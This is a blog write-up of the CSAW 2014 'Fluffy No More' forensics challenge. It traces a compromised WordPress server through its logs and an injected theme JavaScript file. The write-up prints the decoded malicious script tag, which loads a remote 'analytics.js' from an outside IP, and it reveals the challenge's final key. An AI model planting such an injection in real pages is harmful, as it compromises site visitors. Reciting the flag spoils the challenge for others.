Posted on by and filed under CSAW 2014.

I think forensics challenges are generally horrible no fun zones, but Fluffy No More is actually a fun little scavenger hunt through a filesystem. @brad_anton gives us a tarball of the relevant parts of a compromised webserver – a MySQL database dump, /var/log/ , /var/www/ , and all of /etc/.

Co-credit for this challenge goes to Alex Lynch and Kirk Elifson (@kelifson)!

Upon cursory inspection, we find that we have a comprised WordPress site:

fluffy-var-www

Looking through /var/log/apache2/access.log , we find Python and WPScan making a mess in the logs from a source IP of 192.168.127.137:

With the goal of not sifting through logs forever, let’s assume the server was rooted. We checked /var/log/auth.log  to find a suspicious modification:

After jsbeautifying /var/www/html/wp-content/themes/twentythirteen/js/html5.js , we find a suspicious little snippet:

Replace document.write with console.log, slap it all in your favorite browser’s Javascript console, and out comes: <script src='http://128.238.66.100/analytics.js'></script>

Download that, beautify it, and you find this wonderful piece of obfuscated code:

which is actually

We downloaded that, opened it for a laugh, and then I opened it in Notepad++ to find another PDF inside the PDF.

Open  announcement.pdf  in the random tool of the day, PDF Stream Dumper, to find some more JavaScript:

fluffy-pdf-js

Paste that string in a web console, and we get:

“YOU DID IT! CONGRATS! fwiw, javascript obfuscation is sofa king dumb :) key{Those Fluffy Bunnies Make Tummy Bumpy}”